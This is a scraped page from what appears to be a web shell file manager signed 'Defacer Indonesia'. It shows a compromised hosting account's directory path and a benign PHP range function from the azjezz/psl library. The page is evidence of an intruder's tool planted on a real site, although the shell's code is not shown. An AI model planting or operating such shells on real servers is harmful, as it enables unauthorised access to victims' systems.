whoami7 - Manager
:
/
proc
/
self
/
root
/
home
/
kckglobal
/
public_html
/
portal
/
vendor
/
azjezz
/
psl
/
src
/
Psl
/
Range
/
Upload File:
files >> //proc/self/root/home/kckglobal/public_html/portal/vendor/azjezz/psl/src/Psl/Range/between.php
<?php declare(strict_types=1); namespace Psl\Range; /** * @throws Exception\InvalidRangeException If the lower bound is greater than the upper bound. * * @psalm-mutation-free */ function between(int $lower_bound, int $upper_bound, bool $upper_inclusive = false): BetweenRange { return new BetweenRange($lower_bound, $upper_bound, $upper_inclusive); }
Copyright ©2021 || Defacer Indonesia